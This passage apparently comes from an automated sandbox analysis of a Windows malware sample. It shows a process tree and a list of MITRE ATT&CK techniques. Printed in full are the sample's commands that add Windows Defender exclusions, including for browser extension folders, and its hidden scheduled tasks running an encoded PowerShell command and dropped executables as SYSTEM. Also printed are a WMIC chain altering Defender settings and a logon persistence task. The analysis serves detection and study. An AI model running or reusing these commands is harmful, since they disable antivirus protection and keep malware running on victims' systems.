    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1204
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gFmSPwuuQ" /SC once /ST 01:13:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:1468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gFmSPwuuQ"
  2⤵
  PID:1596
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gFmSPwuuQ"
  2⤵
  PID:4748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 02:32:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DslOhGm.exe\" XT /Tgsite_idGeK 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4388
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
  2⤵
  PID:4124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1040
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3620

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2784

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DslOhGm.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DslOhGm.exe XT /Tgsite_idGeK 385118 /S
1⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3000
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
  2⤵
  PID:1204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:2952
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:2256
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:1468
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4064
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:3144
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\wLcbel.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:1680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery